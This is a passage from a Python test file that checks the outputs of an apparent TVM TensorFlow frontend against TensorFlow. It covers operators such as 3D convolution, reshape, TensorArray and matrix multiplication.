"conv", [4, 176, 8, 8, 8], [1, 1, 1, 176, 32], [1, 1, 1], [1, 1, 1], "SAME", "NCDHW"
)
_test_convolution3d(
"conv", [4, 19, 17, 17, 17], [3, 3, 3, 19, 19], [1, 1, 1], [2, 2, 2], "VALID", "NCDHW"
)
_test_convolution3d(
"conv", [4, 124, 17, 17, 17], [1, 1, 1, 124, 19], [1, 1, 1], [1, 1, 1], "SAME", "NCDHW"
)
_test_convolution3d(
"conv", [4, 12, 17, 17, 17], [3, 3, 3, 12, 32], [1, 1, 1], [2, 2, 2], "VALID", "NCDHW"
)
_test_convolution3d(
"conv", [4, 8, 8, 8, 176], [1, 1, 1, 176, 32], [1, 1, 1], [1, 1, 1], "SAME", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 19], [3, 3, 3, 19, 19], [1, 1, 1], [2, 2, 2], "VALID", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 124], [1, 1, 1, 124, 19], [1, 1, 1], [1, 1, 1], "SAME", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 12], [3, 3, 3, 12, 32], [1, 1, 1], [2, 2, 2], "VALID", "NDHWC"
)
# Test without adding shapes to graph def
_test_convolution3d(
"conv",
[4, 17, 17, 17, 12],
[3, 3, 3, 12, 32],
[1, 1, 1],
[2, 2, 2],
"VALID",
"NDHWC",
add_shapes_to_graph_def=False,
)
#######################################################################
# Convolution3D Transpose
# -----------------------
def _test_convolution3d_transpose(
data_shape,
filter_shape,
strides,
padding,
output_shape,
data_format="NCDHW",
add_shapes_to_graph_def=True,
):
"""One iteration of 3D convolution transpose with given shapes and attributes"""
dtype = "float32"
data_array = np.random.uniform(size=data_shape).astype(dtype)
filter_array = np.random.uniform(size=filter_shape).astype(dtype)
if data_format == "NDHWC":
strides = [1] + strides + [1]
else:
strides = [1, 1] + strides
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data_shape, dtype=dtype)
in_filter = constant_op.constant(filter_array, shape=filter_shape, dtype=dtype)
nn_ops.conv3d_transpose(
in_data,
in_filter,
output_shape=output_shape,
strides=strides,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
data_array,
"Placeholder:0",
"conv3d_transpose:0",
cuda_layout="NDHWC",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@tvm.testing.uses_gpu
def test_forward_convolution3d_transpose():
if is_gpu_available():
_test_convolution3d_transpose(
data_shape=[1, 10, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 10],
strides=[1, 1, 1],
padding="VALID",
output_shape=[1, 6, 8, 8, 8],
)
_test_convolution3d_transpose(
data_shape=[4, 9, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 9],
strides=[1, 1, 1],
padding="VALID",
output_shape=[4, 6, 8, 8, 8],
)
_test_convolution3d_transpose(
data_shape=[1, 3, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 3],
strides=[2, 2, 2],
padding="SAME",
output_shape=[1, 6, 15, 15, 15],
)
_test_convolution3d_transpose(
data_shape=[1, 16, 8, 8, 8],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 6, 24, 24, 24],
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 10],
filter_shape=[1, 1, 1, 6, 10],
strides=[1, 1, 1],
padding="VALID",
output_shape=[1, 8, 8, 8, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[4, 8, 8, 8, 9],
filter_shape=[1, 1, 1, 6, 9],
strides=[1, 1, 1],
padding="VALID",
output_shape=[4, 8, 8, 8, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 3],
filter_shape=[1, 1, 1, 6, 3],
strides=[2, 2, 2],
padding="SAME",
output_shape=[1, 15, 15, 15, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 16],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 24, 24, 24, 6],
data_format="NDHWC",
)
# Test without adding shapes to graph def
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 16],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 24, 24, 24, 6],
data_format="NDHWC",
add_shapes_to_graph_def=False,
)
#######################################################################
# BiasAdd
# -----------
def _test_biasadd(tensor_in_sizes, data_format):
"""One iteration of biasadd with given shapes and attributes"""
total_size_1 = 1
for s in tensor_in_sizes:
total_size_1 *= s
tensor_bias_sizes = [tensor_in_sizes[1]] if data_format == "NCHW" else [tensor_in_sizes[3]]
total_size_2 = tensor_bias_sizes[0]
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
bias_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_bias = constant_op.constant(bias_array, shape=tensor_bias_sizes, dtype="float32")
nn_ops.bias_add(in_data, in_bias, data_format=data_format)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"), "Placeholder:0", "BiasAdd:0"
)
@tvm.testing.uses_gpu
def test_forward_biasadd():
if is_gpu_available():
_test_biasadd([4, 176, 8, 8], "NCHW")
_test_biasadd([1, 100, 1, 1], "NCHW")
_test_biasadd([4, 19, 17, 17], "NCHW")
_test_biasadd([4, 124, 3, 3], "NCHW")
_test_biasadd([4, 8, 8, 176], "NHWC")
_test_biasadd([1, 1, 1, 100], "NHWC")
_test_biasadd([4, 17, 17, 19], "NHWC")
_test_biasadd([4, 3, 3, 124], "NHWC")
def _test_forward_where(input_shape):
with tf.Graph().as_default():
dtype = tf.float32
t = tf.constant(
np.random.choice([0, 1, -2, 3, -1, 0.1, -0.2], size=input_shape).astype(dtype.name)
)
out = tf.where(t)
compare_tf_with_tvm([], [], out.name, mode="debug")
compare_tf_with_tvm([], [], out.name, mode="vm")
def test_forward_argwhere():
_test_forward_where((5,))
_test_forward_where((5, 5))
_test_forward_where((5, 5, 5))
_test_forward_where((5, 5, 5, 5))
_test_forward_where((5, 5, 5, 5, 5))
#######################################################################
# SpaceToBatchND
# --------------
def _test_space_to_batch_nd(input_shape, block_shape, paddings, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype=dtype)
out = tf.space_to_batch_nd(in_data, block_shape, paddings)
compare_tf_with_tvm(data, in_data.name, out.name)
def _test_space_to_batch_nd_infer_paddings(input_shape, block_shape, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
padding_np = np.array([0, 1]).astype(np.int32).reshape((1, 2))
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype=dtype)
const1 = tf.constant(padding_np, dtype=tf.int32)
# make paddings an input to tf.transpose, but not an input to the graph,
# so it can be extracted with infer_value_simulated
paddings = tf.reverse(const1, axis=[-1])
out = tf.space_to_batch_nd(in_data, block_shape, paddings)
compare_tf_with_tvm(data, in_data.name, out.name)
def test_forward_space_to_batch_nd():
# test cases: https://www.tensorflow.org/api_docs/cc/class/tensorflow/ops/space-to-batch-n-d
_test_space_to_batch_nd(input_shape=[1, 2, 2, 1], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
_test_space_to_batch_nd(input_shape=[1, 2, 2, 3], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
_test_space_to_batch_nd(input_shape=[1, 4, 4, 1], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
_test_space_to_batch_nd(
input_shape=[2, 2, 4, 1], block_shape=[2, 2], paddings=[[0, 0], [2, 0]], dtype="int64"
)
# pylint: disable=line-too-long
# https://github.com/tensorflow/tensorflow/blob/24f578/tensorflow/python/kernel_tests/spacetobatch_op_test.py
_test_space_to_batch_nd(input_shape=[2, 3], block_shape=[2], paddings=[[1, 0]], dtype="float32")
_test_space_to_batch_nd(
input_shape=[2, 3, 2], block_shape=[2], paddings=[[1, 0]], dtype="float64"
)
_test_space_to_batch_nd_infer_paddings(input_shape=[2, 3, 2], block_shape=[2])
#######################################################################
# BatchToSpaceND
# --------------
def _test_batch_to_space_nd(input_shape, block_shape, crops, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype=dtype)
out = tf.batch_to_space_nd(in_data, block_shape, crops)
compare_tf_with_tvm(data, in_data.name, out.name)
def test_forward_batch_to_space_nd():
# test cases: https://www.tensorflow.org/api_docs/cc/class/tensorflow/ops/batch-to-space-n-d
_test_batch_to_space_nd(input_shape=[4, 1, 1, 1], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
_test_batch_to_space_nd(input_shape=[4, 1, 1, 3], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
_test_batch_to_space_nd(input_shape=[4, 2, 2, 1], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
_test_batch_to_space_nd(
input_shape=[8, 1, 3, 1], block_shape=[2, 2], crops=[[0, 0], [2, 0]], dtype="int64"
)
# pylint: disable=line-too-long
# https://github.com/tensorflow/tensorflow/blob/24f578/tensorflow/python/kernel_tests/batchtospace_op_test.py
_test_batch_to_space_nd(
input_shape=[18, 2, 1, 2], block_shape=[2, 3], crops=[[1, 1], [0, 0]], dtype="float32"
)
_test_batch_to_space_nd(
input_shape=[20, 5, 8, 7], block_shape=[2, 2], crops=[[1, 1], [1, 1]], dtype="float64"
)
#######################################################################
# Reshape
# -------
def _test_reshape(data, out_shape):
"""One iteration of reshape operation with given data and out shape"""
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
array_ops.reshape(in_data, out_shape)
compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_with_call():
"""relay.expr.Call as shape"""
data = np.zeros((6, 4, 2))
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
out_shape = tf.constant([1, 2, 3], dtype="int32")
out_shape = tf.multiply(out_shape, 2)
array_ops.reshape(in_data, out_shape)
compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_like(data, shape_like):
"""A special case for reshape."""
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
in_shape_like = array_ops.placeholder(shape=shape_like.shape, dtype=data.dtype)
out_shape = array_ops.shape(in_shape_like)
array_ops.reshape(in_data, out_shape)
compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_symbolic(data, a_data, b_data):
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
a = array_ops.placeholder(shape=a_data.shape, dtype=a_data.dtype)
b = array_ops.placeholder(shape=b_data.shape, dtype=b_data.dtype)
newshape = tf.add(a, b)
out = array_ops.reshape(in_data, newshape)
for mode in ["debug", "vm"]:
compare_tf_with_tvm(
[data, a_data, b_data], [in_data.name, a.name, b.name], out.name, mode=mode
)
def test_forward_reshape():
_test_reshape(np.arange(6.0), [2, 3])
_test_reshape(np.arange(6), [-1, 2])
_test_reshape(np.arange(6), [3, -1])
_test_reshape(np.arange(6), [-1])
_test_reshape_with_call()
_test_reshape_like(np.zeros((3, 6)), np.zeros((9, 2)))
_test_reshape_symbolic(np.arange(6.0), np.array([2, 0]), np.array([0, 3]))
_test_reshape_symbolic(np.arange(6), np.array([-1, 0]), np.array([0, 2]))
_test_reshape_symbolic(np.arange(6), np.array([3, 0]), np.array([3, -1]))
_test_reshape_symbolic(np.arange(6), np.array([0]), np.array([-1]))
#######################################################################
# DepthToSpace
# ------------
def _test_depthtospace(data, block_size):
"""One iteration of depth_to_space operation with given data and block size"""
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
array_ops.depth_to_space(in_data, block_size)
compare_tf_with_tvm(data, "Placeholder:0", "DepthToSpace:0")
def test_forward_depthtospace():
_test_depthtospace(np.random.normal(size=[1, 32, 32, 4]), 2)
_test_depthtospace(np.random.normal(size=[1, 16, 8, 32]), 4)
#######################################################################
# SpaceToDepth
# ------------
def _test_spacetodepth(data, block_size):
"""One iteration of space_to_depth operation with given data and block size"""
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
array_ops.space_to_depth(in_data, block_size)
compare_tf_with_tvm(data, "Placeholder:0", "SpaceToDepth:0")
def test_forward_spacetodepth():
_test_spacetodepth(np.random.normal(size=[1, 32, 32, 4]), 2)
_test_spacetodepth(np.random.normal(size=[1, 16, 8, 32]), 4)
#######################################################################
# Squeeze
# -------
def _test_squeeze(data, squeeze_dims=None):
"""One iteration of squeeze"""
if squeeze_dims is None:
squeeze_dims = []
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
if squeeze_dims:
array_ops.squeeze(in_data, squeeze_dims)
else:
array_ops.squeeze(in_data)
compare_tf_with_tvm(data, "Placeholder:0", "Squeeze:0")
def test_forward_squeeze():
"""Squeeze"""
# Nothing to squeeze.
_test_squeeze(np.arange(2).reshape((2)))
_test_squeeze(np.arange(6).reshape((2, 3)))
# Squeeze the middle element away.
_test_squeeze(np.arange(4).reshape((2, 1, 2)))
# Squeeze on both ends.
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)))
# Positive squeeze dim index.
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [0])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [2, 4])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [0, 4, 2])
# Negative squeeze dim index.
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-1])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-3, -5])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-3, -5, -1])
#######################################################################
# TensorArray
# -----------
def test_tensor_array_write_read():
def run(dtype_str, infer_shape, element_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
np_data = np.array([[1.0, 2.0], [3.0, 4.0]]).astype(dtype_str)
in_data = [np_data, np_data]
t1 = tf.constant(np_data, dtype=dtype)
t2 = tf.constant(np_data, dtype=dtype)
ta1 = tf.TensorArray(
dtype=dtype, size=2, infer_shape=infer_shape, element_shape=element_shape
)
ta2 = ta1.write(0, t1)
ta3 = ta2.write(1, t2)
out = ta3.read(0)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], "TensorArrayReadV3:0", mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, False, None)
run(dtype, False, tf.TensorShape([None, 2]))
run(dtype, True, None)
def test_tensor_array_scatter():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
if infer_shape:
element_shape = tf.TensorShape([tf.Dimension(None)])
else:
element_shape = None
t = tf.constant(np.array([[1.0], [2.0], [3.0]]).astype(dtype_str), dtype=dtype)
indices = tf.constant([2, 1, 0])
ta1 = tf.TensorArray(
dtype=dtype, size=3, infer_shape=infer_shape, element_shape=element_shape
)
ta2 = ta1.scatter(indices, t)
out0 = ta2.read(0)
out1 = ta2.read(1)
out2 = ta2.read(2)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayReadV3:0"], mode="vm")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_1:0"], mode="vm")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_2:0"], mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_gather():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(np.array([[1.0], [2.0], [3.0]]).astype(dtype_str))
scatter_indices = tf.constant([2, 1, 0])
gather_indices = tf.constant([1, 2])
ta1 = tf.TensorArray(dtype=dtype, size=3, infer_shape=infer_shape)
ta2 = ta1.scatter(scatter_indices, t)
t1 = ta2.gather(gather_indices)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayGatherV3:0"], mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, True)
def test_tensor_array_split():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(
np.array([[1.0], [2.0], [3.0], [4.0], [5.0], [6.0], [7.0], [8.0]]).astype(
dtype_str
),
dtype=dtype,
)
split_length = tf.constant([2, 2, 2, 2], dtype=tf.int32)
ta1 = tf.TensorArray(dtype=dtype, size=4, infer_shape=infer_shape)
ta2 = ta1.split(t, split_length)
out0 = ta2.read(0)
out1 = ta2.read(1)
out2 = ta2.read(2)
out3 = ta2.read(3)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayReadV3:0"], mode="debug")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_1:0"], mode="debug")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_2:0"], mode="debug")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_3:0"], mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_concat():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(
np.array([[1.0], [2.0], [3.0], [4.0], [5.0], [6.0], [7.0], [8.0]]).astype(
dtype_str
),
dtype=dtype,
)
split_length = tf.constant([2, 2, 2, 2], dtype=tf.int32)
ta1 = tf.TensorArray(dtype=dtype, size=4, infer_shape=infer_shape)
ta2 = ta1.split(t, split_length)
t = ta2.concat()
out = tf.identity(t)
compare_tf_with_tvm([], [], ["Identity:0"], mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_size():
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
pytest.skip("Needs fixing for tflite >= 1.15.0")
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
np_data = np.array([[1.0, 2.0], [3.0, 4.0]]).astype(dtype_str)
in_data = [np_data, np_data]
t1 = tf.constant(np_data, dtype=dtype)
t2 = tf.constant(np_data, dtype=dtype)
ta1 = tf.TensorArray(dtype=dtype, size=2, infer_shape=infer_shape)
ta2 = ta1.write(0, t1)
ta3 = ta2.write(1, t2)
out = ta3.size()
g = tf.get_default_graph()
compare_tf_with_tvm([], [], "TensorArraySizeV3:0", mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_stack():
def run(dtype_str, infer_shape):
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
pytest.skip("Needs fixing for tflite >= 1.15.0")
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(np.array([[1.0], [2.0], [3.0]]).astype(dtype_str))
scatter_indices = tf.constant([2, 1, 0])
ta1 = tf.TensorArray(dtype=dtype, size=3, infer_shape=infer_shape)
ta2 = ta1.scatter(scatter_indices, t)
t1 = ta2.stack()
print(t1)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayStack/TensorArrayGatherV3:0"], mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, True)
def test_tensor_array_unstack():
def run(dtype_str, input_shape, infer_shape):
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
pytest.skip("Needs fixing for tflite >= 1.15.0")
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(np.random.choice([0, 1, 2, 3], size=input_shape).astype(dtype.name))
ta1 = tf.TensorArray(dtype=dtype, infer_shape=infer_shape, size=input_shape[0])
ta2 = ta1.unstack(t)
out0 = ta2.size()
out1 = ta2.read(0)
compare_tf_with_tvm([], [], "TensorArraySizeV3:0", mode="debug")
compare_tf_with_tvm([], [], "TensorArrayReadV3:0", mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, (5,), False)
run(dtype, (5, 5), True)
run(dtype, (5, 5, 5), False)
run(dtype, (5, 5, 5, 5), True)
#######################################################################
# ConcatV2
# --------
def _test_concat_v2(shape1, shape2, dim):
"""One iteration of ConcatV2"""
with tf.Graph().as_default():
dtype = "float32"
in1 = tf.placeholder(shape=shape1, dtype=dtype, name="in1")
in2 = tf.placeholder(shape=shape2, dtype=dtype, name="in2")
array_ops.concat_v2([in1, in2], dim)
np_data1 = np.random.uniform(size=shape1).astype(dtype)
np_data2 = np.random.uniform(size=shape2).astype(dtype)
compare_tf_with_tvm([np_data1, np_data2], ["in1:0", "in2:0"], "ConcatV2:0")
def test_forward_concat_v2():
if tf.__version__ < LooseVersion("1.4.1"):
return
_test_concat_v2([2, 3], [2, 3], 0)
_test_concat_v2([10, 3, 5], [2, 3, 5], 0)
_test_concat_v2([2, 3], [2, 3], 1)
_test_concat_v2([5, 8], [5, 4], 1)
_test_concat_v2([2, 8, 5], [2, 8, 6], -1)
#######################################################################
# Sigmoid
# -------
def _test_sigmoid(data):
"""One iteration of sigmoid"""
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
sigmoid_out = math_ops.sigmoid(in_data)
compare_tf_with_tvm(data, "Placeholder:0", "Sigmoid:0")
def test_forward_sigmoid():
"""Sigmoid"""
_test_sigmoid(np.random.uniform(size=(3, 4, 4, 3)).astype("float32"))
#######################################################################
# Argmin/Argmax
# -------------
def _test_argx(func, data, **kwargs):
with tf.Graph().as_default():
inp = array_ops.placeholder(shape=data.shape, dtype=data.dtype, name="c0")
func(inp, name="argx0", **kwargs)
compare_tf_with_tvm(data, "c0:0", "argx0:0")
def test_forward_argminmax():
for output_type in [tf.int64, tf.int32]:
for axis in [None, 0, 1, 2]:
data = np.random.uniform(size=(8, 4, 9)).astype("float32")
_test_argx(tf.argmax, data=data, axis=axis, output_type=output_type)
_test_argx(tf.argmin, data=data, axis=axis, output_type=output_type)
#######################################################################
# Variable
# --------
def _test_variable(data):
"""One iteration of a variable"""
tf.reset_default_graph()
with tf.Graph().as_default():
input_op = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
input_tensor = array_ops.reshape(input_op, data.shape)
size = input_tensor.shape.dims[1]
with variable_scope.variable_scope("linear", reuse=None):
w = variable_scope.get_variable("w", shape=[size, size], dtype=input_tensor.dtype)
math_ops.matmul(input_tensor, w)
compare_tf_with_tvm(data, "Placeholder:0", "MatMul:0", init_global_variables=True)
def test_forward_variable():
"""Variable type op test"""
_test_variable(np.random.uniform(size=(32, 100)).astype("float32"))
@tvm.testing.parametrize_targets("llvm", "cuda")
def test_read_variable_op(target, dev):
"""Read Variable op test"""
tf.reset_default_graph()
data = np.random.uniform(size=(32, 100)).astype("float32")
input_tensor = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
size = input_tensor.shape.dims[1]
var_data = np.random.uniform(-5, 5, size=[size, size]).astype(np.float32)
input_var = tf.Variable(var_data, name="var1", use_resource=True)
math_ops.matmul(input_tensor, input_var)
out_name = ["MatMul:0"]
out_node = ["MatMul"]
in_name = ["Placeholder:0"]
in_node = ["Placeholder"]
in_data = [data]
with tf.Session() as sess:
sess.run(variables.global_variables_initializer())
final_graph_def = sess.graph.as_graph_def(add_shapes=True)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
shape_dict = {e: i.shape for e, i in zip(in_name, in_data)}
with pytest.raises(Exception) as execinfo:
mod, params = relay.frontend.from_tensorflow(
final_graph_def, layout=None, shape=shape_dict, outputs=None
)
assert execinfo.value.args[0].startswith("Graph is not frozen. Provide a frozen graph")
# Now convert the variables to constant and run inference on the converted graph
final_graph_def = tf.graph_util.convert_variables_to_constants(
sess,
sess.graph.as_graph_def(add_shapes=True),
out_node,
)
tvm_output = run_tvm_graph(
final_graph_def,
in_data,
in_node,
target=target,
out_names=out_name,
num_output=len(out_name),
)
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-4, rtol=1e-5)
sess.close()
#######################################################################
# MatMul, BatchMatMul, BatchMatMulV2
# ----------------------------------
def _test_matmul(i, j, k, dtype, outer=None):
"""One iteration of matmul"""
A_shape_init = [i, j]
B_shape_init = [j, k]
for transpose_a in [False, True]:
for transpose_b in [False, True]:
outer = outer or []
A_shape = outer + (A_shape_init[::-1] if transpose_a else A_shape_init)
B_shape = outer + (B_shape_init[::-1] if transpose_b else B_shape_init)
with tf.Graph().as_default():
A = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
result = tf.matmul(A, B, transpose_a=transpose_a, transpose_b=transpose_b)
A_np = np.random.uniform(high=5.0, size=A_shape).astype(dtype)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([A_np, B_np], [A.name, B.name], result.name)
def test_forward_matmul():
"""MatMul op test"""
_test_matmul(1, 3, 6, "int32")
_test_matmul(5, 3, 1, "float64")
def _test_batch_matmul(A_shape, B_shape, dtype, adjoint_a=False, adjoint_b=False):
with tf.Graph().as_default():
A = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
result = tf.matmul(A, B, adjoint_a=adjoint_a, adjoint_b=adjoint_b, name="batchmatmul")
A_np = np.random.uniform(high=5.0, size=A_shape).astype(dtype)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([A_np, B_np], [A.name, B.name], result.name)
def _test_batch_matmul_dynamic(
A_shape, B_shape, A_np_shape, B_np_shape, dtype, adjoint_a=False, adjoint_b=False
):
with tf.Graph().as_default():
A = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
result = tf.matmul(A, B, adjoint_a=adjoint_a, adjoint_b=adjoint_b, name="batchmatmul")
A_np = np.random.uniform(high=5.0, size=A_np_shape).astype(dtype)
B_np = np.random.uniform(high=5.0, size=B_np_shape).astype(dtype)
# for now, in TOPI, only cublas's implementation support dynamic shape
# TODO add more backends support in TOPI
compare_tf_with_tvm(
[A_np, B_np], [A.name, B.name], result.name, mode="vm", targets=["cuda -libs=cublas"]
)
def test_forward_batch_matmul():
"""TF op BatchMatMul, BatchMatMulV2 test"""
_test_batch_matmul((3, 5, 4), (3, 4, 5), "int32")
_test_batch_matmul((3, 5, 4), (3, 4, 5), "float32", True, True)
_test_batch_matmul((3, 5, 4), (3, 5, 4), "int32", True, False)
_test_batch_matmul((3, 5, 4), (3, 5, 4), "float32", False, True)
_test_batch_matmul((2, 3, 4, 5, 6), (2, 3, 4, 6, 5), "int32")
_test_batch_matmul((1, 2, 3, 4, 5, 6), (1, 2, 3, 4, 6, 5), "float32", True, True)
_test_batch_matmul((3, 4, 5, 6), (3, 4, 5, 6), "int32", True, False)
_test_batch_matmul((2, 3, 4, 2, 3, 4, 5, 6), (2, 3, 4, 2, 3, 4, 5, 6), "float32", False, True)
@tvm.testing.requires_cuda
def test_forward_batch_matmul_dynamic():
_test_batch_matmul_dynamic((None, 5, 4), (None, 4, 5), (3, 5, 4), (3, 4, 5), "int32")
_test_batch_matmul_dynamic(
(None, 5, 4), (None, 4, 5), (3, 5, 4), (3, 4, 5), "float32", True, True
)
_test_batch_matmul_dynamic(
(None, 5, 4), (None, 5, 4), (3, 5, 4), (3, 5, 4), "int32", True, False
)
_test_batch_matmul_dynamic(
(None, 5, 4), (None, 5, 4), (3, 5, 4), (3, 5, 4), "float32", False, True
)
_test_batch_matmul_dynamic(
(None, 4, 5, 6), (None, 4, 6, 5), (3, 4, 5, 6), (3, 4, 6, 5), "float32"
)
_test_batch_matmul_dynamic(
(None, None, 5, 6), (None, None, 6, 5), (3, 4, 5, 6), (3, 4, 6, 5), "float32"
)
_test_batch_matmul_dynamic(
(None, None, None, 5, 6),
(None, None, None, 6, 5),
(2, 3, 4, 5, 6),
(2, 3, 4, 6, 5),
"float32",
)
#######################################################################
# SparseTensorDenseMatMul
# ----------------------------------
def _test_sparse_dense_matmul(indices, values, A_inp_shape, B_inp_shape, dtype, flip=False):
"""One iteration of sparse_dense_matmul"""
for adjoint_a in [False, True]:
for adjoint_b in [False, True]:
A_shape = A_inp_shape[::-1] if adjoint_a else A_inp_shape
B_shape = B_inp_shape[::-1] if adjoint_b else B_inp_shape
with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=A_shape)
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
if flip:
result = tf.sparse.sparse_dense_matmul(
B, A_sp, adjoint_a=adjoint_b, adjoint_b=adjoint_a
)
else:
result = tf.sparse.sparse_dense_matmul(
A_sp, B, adjoint_a=adjoint_a, adjoint_b=adjoint_b
)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([B_np], [B.name], result.name)
def test_forward_sparse_dense_matmul():
"""sparse_dense_matmul op test"""
###################################################################
#
# In order to create a SparseTensor, it requires 3 input as below:
# SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
#
# Above Sparse can be represented in Dense as below :
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [4, 3], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [3, 3], [3, 3], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], "float32")
